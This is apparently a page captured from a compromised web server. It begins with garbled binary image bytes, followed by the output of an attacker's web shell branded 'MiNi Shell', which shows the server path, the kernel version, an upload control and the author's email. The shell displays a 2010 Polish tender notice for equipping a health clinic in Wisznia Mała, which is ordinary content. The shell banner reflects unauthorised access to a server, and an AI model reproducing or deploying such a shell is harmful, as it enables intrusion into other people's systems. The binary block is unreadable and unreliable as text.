JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101112/321531-N-2010.html

<p class="kh_header"><b>Wisznia Mała: Wyposażenie budynku Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wiszni Małej</b><br>
<b>Numer ogłoszenia: 321531 - 2010; data zamieszczenia: 12.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wisznia Mała , ul. Wrocławska 9, 55-114 Wisznia Mała, woj. dolnośląskie, tel. 071 3127025, faks 071 3127068.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiszniamala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie budynku Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wiszni Małej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wyposażenie w meble medyczne i biurowe* oraz sprzęt medyczny* i gospodarczy Zakładu Opieki Zdrowotnej w Wiszni Małej, w ramach realizacji projektu: Budowa infrastruktury ochrony zdrowia - Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wiszni Małej. (*Wykonawca mebli biurowych i sprzętu medycznego został wyłoniony w poprzednim postępowaniu prowadzonym w trybie przetargu nieograniczonego ogłoszonym w dniu 29.10.2010 nr ogłoszenia 306185-2010)
2.	Dostawy będą realizowane według następujących pakietów:  
Pakiet 1	Meble medyczne 
Pakiet 6	Dozowniki, pojemniki, kosze
Pakiet 7	Sprzęt AGD 
Pakiet 9	Oznaczenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2, 39.83.17.00-3, 39.22.43.40-3, 42.51.30.00-5, 30.19.38.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje w niniejszym postępowaniu wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek, jeżeli posiada uprawnienia do wykonywania określonej działalności lub czynność, jeżeli przepisy prawa nakładają obowiązek ich posiadania;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5)	spełniają warunki, dotyczące posiadania wiedzy i doświadczenia, polegające na wykonaniu w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej 2 różnych dostaw wraz z uruchomieniem lub montażem sprzętu określonego w pakiecie, na który składa ofertę - w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek może być spełniony wspólnie.
Opis sposobu dokonywania oceny spełniania warunku:
- 	Wykonawca spełnia warunek, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał przynajmniej 2 różne dostawy wraz z uruchomieniem oraz rozmieszczeniem lub instalacją dostarczonego sprzętu określonego w pakiecie, na który składa ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz ofertowy.
2.	Wypełnioną tabelę cen dla pakietu, na który składana jest oferta (sporządzone według załącznika nr 4 do niniejszej IDW).
3. 7.	Pełnomocnictwo. W przypadku, gdy upoważnienie osoby podpisującej ofertę nie wynika wprost z dokumentów stwierdzających status prawny Wykonawcy (odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej), to do oferty należy dołączyć oryginał lub poświadczoną za zgodność z oryginałem przez notariusza kopię stosownego pełnomocnictwa wystawioną przez osobę(y) uprawnioną do reprezentowania Wykonawcy. Pełnomocnictwo w swej treści powinno bezpośrednio i jednoznacznie wskazywać na uprawnienie określonej osoby do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zgodnie z art. 144 Ustawy Pzp Zamawiający przewiduje zmianę zawartej Umowy w stosunku do treści oferty Wykonawcy, na podstawie określonych poniżej warunków:
a)	zmiana ceny przy zaistnieniu zmian stawek podatkowych (znaczący wzrost cen czynników niezależnych od Wykonawcy);
b)	zmiany terminu realizacji przedmiotu umowy ze względu na zmiany terminów 
w Projekcie;
c)	zmiany terminu w przypadku zawieszenia realizacji dostaw, jeżeli zawieszenie będzie miało wpływ na termin wykonania Umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiszniamala.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2010 godzina 11:00, miejsce: Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unie Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1	Meble medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Fotel z oparciami do pobierania krwi 3 szt.szkielet metalowy pokryty lakierem proszkowym, siedzisko, oparcie i podłokietnik tapicerowane, tapicerka bezszwowa, kolor do wyboru, podłokietnik z regulacją wysokości i kąta ustawienia, fotel przystosowany do zabiegu iniekcji na prawym lub lewym przedramieniu osoby poddawanej zbiegowi, przystosowany do mycia i dezynfekcji środkami dopuszczonymi do użycia w służbie zdrowia,2	Szafa lekarska 6 szt. Szafa metalowa dzielona - w górnej części pojedyncze drzwi z przeszklonym frontem, dolnej części pojedyncze
drzwi pełne, drzwi z zamkiem w górnej części min trzy regulowane półki w dolnej części jedna półka wymiary szafy około: wysokość - 170-180 cm, szerokość - 60 cm, głębokość - 43- 45 cm.	szafa ma mieć nogi min. 10 cm. wyposażone w stopki z tworzywa. 3Szafa lekarska 3 szt. szafa metalowa dwudrzwiowa dzielona - górna część - front  przeszklony, dolna część pełna drzwi z zamkiem drzwi otwierane skrzydłowo w górnej części min trzy półki regulowane w dolnej części jedna półka podstawa szafy na nóżkach o wysokości min 10 cm z możliwością wypoziomowania	wymiary szafy około: wysokość - 170-180 cm, szerokość -100 cm, głębokość - 43 - 45 cm 4 Szafka lekarska 3 szt szafka metalowa wisząca drzwi pojedyncze z przeszklonym     frontem wewnątrz min. jedna półka wymiary szafy około: wysokość - 60 cm, szerokość - 60 cm, głębokość - 35 cm. 5. Stolik zabiegowy do narzędzi 3 szt.Metalowy szkielet lakierowany proszkowo, dwie wyjmowane nierdzewne tace, wysuwana szuflada na prowadnicach rolkowych, cztery kółka jezdne, w tym dwa z blokadą. Minimalne parametry techniczne: Długość: 745 mm Szerokość 450 mm Wysokość 800 mm6Stolik podręczny zabiegowy	9 szt.	Metalowy szkielet lakierowany proszkowo, dwie szklane półki lub półki metalowe, uchylne miski tworzywowe, cztery kółka jezdne, w tym dwa z blokadą. Minimalne parametry techniczne:  Długość:	720 mm Szerokość	400 mm 	Wysokość	800 mm 7Asystor stomatologiczny 2 szt. Asystor wykonany z  płyty meblowej, na regulowanej sprężynie gazowej  Szuflady metalowe na metalowych prowadnicach. Kółka gumowane zapobiegające rysowaniu podłogi. Góra: ograniczniki z wszystkich stron oraz gruba szyba pozwalajaca na dobra dezynfekcję powierzchni. Asystor 4 szuflady zaopatrzony w jedną wkładkę do szuflady na narzędzia i materiały. Minimalne parametry techniczne:   Szerokość: 50,5 cm, Głębokość: 42,5 cm, Regulacja wysokości: 93,0-106,0 cm 8	Wózek do transportu sprzętu medycznego	2 szt.	Wykonany ze stali
Służy do przemieszczania na niewielkie odległości instrumentów medycznych, aparatury medycznej, materiałów medycznych.Wyposażony w dwa blaty.
9	Stół do badania niemowląt 4 szt.	Metalowy szkielet lakierowany proszkowo, tapicerowane leże dostępne w różnych kolorach, wbudowana szafka oraz wysuwana półka boczna wykonana z płyty meblowej, cztery stopki regulacyjne.Minimalne parametry techniczne:Długość:900 mm Szerokość:	700 mm Wysokość:	870 mm	10 Stolik do przewijania niemowląt 2 szt.	Stolik do przewijania niemowląt z boczkami zabezpieczającymi wypadnięcie. Stelaż stolika metalowy, tapicerka zmywalna11Kozetka lekarska	9 szt.	składana podstawa kozetki, z kształtowników stalowych, lakierowana proszkowo, leże tapicerowane gąbką i skajem, bezszwowo, regulowany kąt nachylenia podgłówka; kozetka wyposażona w uchwyt na rolkę podkładu papierowego, przystosowana do mycia i dezynfekcji środkami dopuszczonymi do użycia w służbie zdrowia 12	Kozetka lekarska	1 szt.	Drewniana konstrukcja, materiał wykończony bezszwowo, regulowany kąt nachylenia podgłówka
13Parawan lekarski	13 szt.Parawan medyczny pojedynczy metalowy szkielet, lakierowany proszkowo, wersja na kółkach, możliwość spinania kilku segmentów za pomocą zatrzasków tworzywowych, z zasłoną z folii zmywalnej, stelaż przystosowany do mycia i dezynfekcji środkami dopuszczonymi do użycia w służbie zdrowia 14	Taboret obrotowy	10 szt.Metalowy szkielet lakierowany proszkowo, śrubowa regulacja wysokości siedziska, siedzisko tapicerowane, możliwość wyboru koloru tapicerki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 6	Dozowniki, pojemniki, kosze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dozowniki do ręczników jednorazowych16 szt.Dozownik na ręczniki papierowe typu ZZ, skrzynkowy, wykonany z tworzywa, w kształcie prostopadłościanu, wyposażony w uchylną ściankę z zamkiem i otworem wskazującym ilość ręczników w dozowniku Dozowniki na mydło 16 szt. Łokciowy, wykonany z tworzywa w kształcie prostopadłościanu, nasuwany na przytwierdzony do ściany wieszak z blokadą zamykaną wieczkiem na korpusie pojemnika, uruchamiany łokciowo mechanizmem dźwigniowym, o pojemności 1 l Dozownik na środek antyseptyczny 16 szt. Łokciowy, wykonany z tworzywa w kształcie prostopadłościanu, nasuwany na przytwierdzony do ściany wieszak z blokadą zamykaną wieczkiem na korpusie pojemnika, uruchamiany łokciowo mechanizmem dźwigniowym, o pojemności 1 l Kosz na odpady medyczne 18 szt.Kosz pedałowy, min 30 l (metalowy); okrągły, wkład plastikowy, uchwyt do przenoszenia, Dozowniki na mydło 8 szt Dozownik na mydło w płynie, wykonany z tworzywa Dozowniki do papieru toaletowego 9 szt Pojemnik na papier toaletowy wykonany z tworzywa, kolor do uzgodnienia Dozowniki do ręczników jednorazowych 8 szt. Pojemnik na ręczniki papierowe wykonany z tworzywa,  kolor do uzgodnienia Kosz na odpady 9 szt Kosz pedałowy mały - 5 l, wykonany z tworzywa sztucznego typu plastik, pedałowy kształt walca lub sześcianu, kolor do uzgodnienia Sprzęt do sprzątania 1 szt Wózek na akcesoria do sprzątania, mieści akcesoria do sprzątania, szczotki, wiadra, itd.Kosz na odpady 4 szt.Kosz pedałowy - min 30 l (z tworzywa); okrągły, wkład plastikowy, uchwyt do przenoszenia, kolor do uzgodnienia Pojemnik 12 szt Uniwersalny pojemnik na niebezpieczne odpady medyczne, posiada szereg otworów o różnych wielkościach i przeznaczeniu oraz zatrzaskowe zamknięcie z możliwością wielokrotnego otwierania i po napełnieniu trwałego szczelnego zamknięcia.
Pojemność: 1 litr..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.17.00-3, 39.22.43.40-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 7	Sprzęt AGD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czajnik elektryczny 1 szt. Czajnik elektryczny o pojemności min 1,7 litra i mocy  minimalnej 2400 W Lodówka do zabudowy 5 szt chłodziarka podblatowa do zabudowy z wewnętrznym zamrażalnikiem, pojemności całkowita min 125 litrów,klasa energetyczna min A,wyposażona we wskaźnik temperatury (wewnętrzny lub zewnętrzny)Lodówka 1szt Stanowi wyposażenie pomieszczenia socjalnego Wolnostojąca, o pojemności około 150 l, klasa energetyczna min A.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.51.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 9	Oznaczenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tabliczki przydrzwiowe 23 szt Tabliczka na bazie aluminiowych srebrnych profili, 
Elementy tabliczki: -Profil aluminiowy płaski wysokości około 6 cm, na którym będzie nadrukowany numer pomieszczenia. -Profil aluminiowy na wsuwkę wysokości około 3 cm, -Zatyczka plastikowa boczna -Zamknięcie profil aluminiowy -Wsuwka z nadrukiem
-Folia przezroczysta błysk lub mat Tablica zbiorcza 3 szt.Tablica na bazie aluminiowych srebrnych profili,jednokolumnowa pozwalająca na umieszczenie nazwy pomieszczenia i jego numeru.Składająca się z:-profilu płaskiego na którym będzie umieszczona nazwa ośrodka -profilu na nagłówkowym -23 profili z informacją o numerze pomieszczenia i jego funkcji Cyferki i oznaczenia toalet 1 kpl. Cyfry o wysokości około 5 cm naklejane na drzwi Niezbędne do oznaczenia kolejno drzwi numerami od 1 do 23 Tabliczki naklejane na drzwi z oznaczeniem rodzaju toalety: dla kobiet - 4 szt., dla mężczyzn - 3 szt., dla niepełnosprawnych - 3 szt.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.38.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com